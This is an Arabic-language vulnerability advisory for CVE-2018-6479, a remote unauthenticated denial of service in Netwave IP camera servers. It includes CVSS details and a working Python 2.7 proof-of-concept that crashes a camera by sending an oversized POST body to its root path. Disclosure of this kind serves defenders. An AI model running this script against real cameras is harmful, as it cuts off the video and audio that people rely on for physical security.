
[CVE-2018-6479] خادم كاميرا Netwave IP عرضة لهجوم رفض الخدمة عبر طلب POST ضخم واحد.
| CVE | الوصف |
|---|---|
| CVE-2018-6479 | ثغرة رفض خدمة عن بُعد بدون مصادقة |
| CVSS | الدرجة | التفاصيل |
|---|---|---|
| 3 | 7.3 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:X/RL:W/RC:X |
أثناء بحث أمني في إنترنت الأشياء، تم اكتشاف بعض الثغرات في موردي كاميرات IP مختلفين. كاميرا Netwave IP هي خادم كاميرا IP يسمح بمشاهدة فيديو الكاميرا وإدارتها. تُستخدم كاميرات IP بشكل خاص لأغراض الأمن المادي والتحكم، لذا فإن توفرها أمر بالغ الأهمية.
يمكن تعطيل أي كاميرا Netwave IP عن طريق إرسال طلب POST ضخم إلى مسارها الجذر. بمجرد إرسال الطلب، يتعطل الجهاز ويتوقف عن بث الصوت والفيديو.
إثبات المفهوم: قم بتشغيل سكربت Python 2.7 التالي ضد أي كاميرا NetWave IP، وسيتوقف عن الاستجابة وبث الفيديو/الصوت فورًا.
import string
import httplib
import urllib2
host = "CAMERA_IP"
port = 80
params='A'*9999999 # Huge body
headers = {
"Host": host + ':' + str(port),
"Connection": "keep-alive",
"Content-Length": 9999999,
}
url = "/"
conn = httplib.HTTPConnection(host,port=port)
conn.request("POST",url,params,headers)
response = conn.getresponse()
data = response.read()
print data
Gonzalo García León